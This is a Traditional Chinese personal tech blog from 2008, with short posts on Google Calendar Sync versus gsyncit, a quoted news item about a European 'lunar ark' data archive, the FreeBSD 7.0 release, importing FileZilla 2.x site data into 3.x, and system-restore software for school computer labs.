3/21 傍晚已經有公開聲明出現了,至於要不要相信還是看各位自己,我個人比較喜歡用 wget。

Google Calendar Sync

Google Calendar Sync 是 Google 官方新推出的小工具,可以讓你同步 Google Calendar 與 Outlook 行事曆。

不過功能實在陽春,它只能同步一個行事曆。比如有的人會公事、私事行事曆分開管理,這個工具就沒辦法達成要求。另外也不能做更細部的設定,比如我只想要同步幾天之內或幾月幾日至幾月幾日的行事曆事件,它也不提供選擇的機會。

所以我目前暫時繼續使用 gsyncit 來同步資料。

資料來源:

我覺得 Google Calendar 還缺一個好用的 Notifier,它的 Pop-up 提醒實在是太虛了啊~

2008年3月11日 星期二

異地備援

根據以下內容的描述,這真是最遠的異地備援了吧!


以下節錄自科幻科學報No.413

科學小視窗
▌月球方舟保存人類文明
▌文╱科科報編輯小組


  根據英國《週日泰晤士報》報導,歐洲科學家正研擬設置「月球方舟」,把各種有關人類生命和文明資訊儲存在月球上,以防地球被毀滅後,倖存者能重建文明。

  科學家希望在2020年以前,在月球建立實驗資料庫,持續運作30年,並在2035年前成立完整的資料庫,儲存人類的生命、作物、科技和歷史資料。

  計畫將會在地球上設置4000個避難所,在地球遭小行星襲擊或核子爆炸後,接收由月球不斷傳來的訊息,以各種語言教導人類如何重建文明。

2008年3月5日 星期三

FreeBSD 網頁改版??

剛剛連上 www.freeebsd.org 的網頁,發現小惡魔不見了,整個畫面變成完全不同的風格,我以為 FreeBSD 網站做了大改版,過了幾秒鐘才發現我多打了一個 e...

烏龍事件...

2008年2月27日 星期三

Freebsd 7.0 RELEASE

雖然 FreeBSD 官方網站還沒有發佈,但是他們的 FTP 已經可以看到 FreeBSD 7.0 RELEASE 的 ISO 檔了。

根據 7.0 版的開發時間表,7.0 RELEASE 原訂於 2 月 26 日發佈,現已經遲了一天,但猜想也是這兩天就會公佈了吧。

如果對於 FreeBSD 7.0 RELEASE 新增功能有興趣的話,可以看一下這裡:

What's New in FreeBSD 7.0

2008年2月14日 星期四

將 Filezilla 2.x 站台資料匯入 Filezilla 3.x

請在 Filezilla 3.x 的選單中,點選「編輯」、「匯入」

然後去選擇舊版的站台資料,位置通常在 C:\program files\Filezilla\Filezilla.xml

這樣就可以了。(不過僅能匯入主機位址、連接埠、使用者名稱與密碼,當然這也就夠了)

之前嘗試過先在 2.x 版進行匯出,再到 3.x 匯入,結果一直無法成功,原因是 2.x 匯出的資料僅是設定檔,而沒有站台資料。

2008年1月21日 星期一

系統還原軟體

沒有錢買還原卡的學校可以考慮一下,但軟體式的通常會比硬體式的容易出問題喔。不知道各位學校網管喜歡哪一套還原硬體或軟體呢?
之前推薦過北軟的大漢天威卡,後來知道它是軟體式的,常常出狀況,所以不再推薦。